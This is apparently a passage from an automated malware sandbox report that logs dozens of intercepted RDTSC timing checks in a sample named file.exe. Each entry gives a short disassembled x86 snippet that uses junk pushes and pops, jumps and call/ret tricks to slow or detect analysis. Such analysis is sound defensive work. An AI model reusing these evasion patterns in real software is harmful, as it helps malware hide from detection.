Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196EA5 second address: 1196EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7ADCEEDC9Bh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 jmp 00007F7ADCEEDC9Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11972C4 second address: 11972DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADD664237h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11972DF second address: 119730E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEEDCA0h 0x00000007 jmp 00007F7ADCEEDCA7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 119730E second address: 1197314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 119A4F6 second address: 119A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 119A4FC second address: 119A509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 119A509 second address: 119A569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7ADCEEDCA5h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jng 00007F7ADCEEDCADh 0x00000015 jmp 00007F7ADCEEDCA7h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jo 00007F7ADCEEDCA2h 0x00000022 jmp 00007F7ADCEEDC9Ch 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jc 00007F7ADCEEDC96h 0x00000034 push ecx 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A569 second address: 119A56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AC3F4 second address: 11AC3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AC3F8 second address: 11AC412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7ADD664232h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1190112 second address: 119011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B89B4 second address: 11B89D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADD664239h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C64 second address: 11B8C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnl 00007F7ADCEEDC96h 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8E15 second address: 11B8E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8E19 second address: 11B8E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FBC second address: 11B8FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FC0 second address: 11B8FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FC6 second address: 11B8FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9100 second address: 11B910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B926B second address: 11B929A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 jg 00007F7ADD66422Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F7ADD664235h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B929A second address: 11B92B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCEEDCA5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B92B5 second address: 11B92D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7ADD664226h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7ADD664226h 0x00000014 jmp 00007F7ADD66422Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B956C second address: 11B9570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9570 second address: 11B957D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7ADD664226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B957D second address: 11B9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9585 second address: 11B958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9F67 second address: 11B9F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0BB second address: 11BA0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0C0 second address: 11BA0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0C8 second address: 11BA0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA3D3 second address: 11BA3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F7ADCEEDC96h 0x0000000d jmp 00007F7ADCEEDCA5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF7F2 second address: 11BF7F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF7F8 second address: 11BF806 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF806 second address: 11BF80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE51 second address: 11BFE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE57 second address: 11BFE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE5B second address: 11BFE78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7ADCEEDCA0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE792 second address: 11BE798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D30 second address: 11C1D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D36 second address: 11C1D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D3A second address: 11C1D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D3E second address: 11C1D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7ADD664235h 0x00000010 push edx 0x00000011 jmp 00007F7ADD66422Ch 0x00000016 js 00007F7ADD664226h 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D78 second address: 11C1D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D7C second address: 11C1D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48A3 second address: 11C48B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48B2 second address: 11C48C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADD66422Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48C7 second address: 11C48CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48CF second address: 11C48D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4A39 second address: 11C4A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4B8F second address: 11C4B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4B93 second address: 11C4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCEEDC9Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4BA8 second address: 11C4BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4BAC second address: 11C4BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D58 second address: 11C4D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADD66422Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D68 second address: 11C4D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7ADCEEDC9Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C503F second address: 11C505E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7ADD664233h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BA9 second address: 11C8BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7ADCEEDC96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BB4 second address: 11C8BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BBA second address: 11C8BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C94E3 second address: 11C951C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a je 00007F7ADD66422Ch 0x00000010 pop ecx 0x00000011 xchg eax, ebx 0x00000012 mov dword ptr [ebp+122D2FD8h], edi 0x00000018 nop 0x00000019 jmp 00007F7ADD664235h 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C95FF second address: 11C9616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEEDC9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9616 second address: 11C9633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADD664239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9633 second address: 11C9639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9639 second address: 11C963D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C963D second address: 11C9641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C96E7 second address: 11C96ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9FA5 second address: 11C9FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9FA9 second address: 11C9FAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CA960 second address: 11CA978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCEEDCA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB3FA second address: 11CB400 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBCD7 second address: 11CBCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB400 second address: 11CB40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7ADD664226h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB40A second address: 11CB40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCFA4 second address: 11CCFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDCF8 second address: 11CDCFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CA3 second address: 11D2CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F7ADCC94D48h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7ADCC94D51h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CC6 second address: 11D2CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4441 second address: 11D4447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D356F second address: 11D3579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4447 second address: 11D44DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F7ADCC94D48h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add dword ptr [ebp+1246DFA2h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F7ADCC94D48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F7ADCC94D48h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 call 00007F7ADCC94D4Ah 0x00000066 mov bl, 00h 0x00000068 pop edi 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F7ADCC94D50h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3579 second address: 11D357D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5592 second address: 11D5596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D46E4 second address: 11D46E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D46E8 second address: 11D46EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D755F second address: 11D7565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7565 second address: 11D7569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D75FF second address: 11D7604 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7604 second address: 11D7611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8559 second address: 11D85B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7ADCB94CD3h 0x0000000f jmp 00007F7ADCB94CCDh 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F7ADCB94CC8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D1E49h], edi 0x00000035 push 00000000h 0x00000037 jng 00007F7ADCB94CCCh 0x0000003d mov ebx, dword ptr [ebp+122D2C55h] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b pop edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9575 second address: 11D9590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCC94D57h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF812 second address: 11DF82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF82B second address: 11DF835 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7ADCC94D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181035 second address: 1181055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CCAh 0x00000007 jmp 00007F7ADCB94CCEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181055 second address: 1181059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181059 second address: 1181080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCB94CD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F7ADCB94CC6h 0x0000001c rdtsc
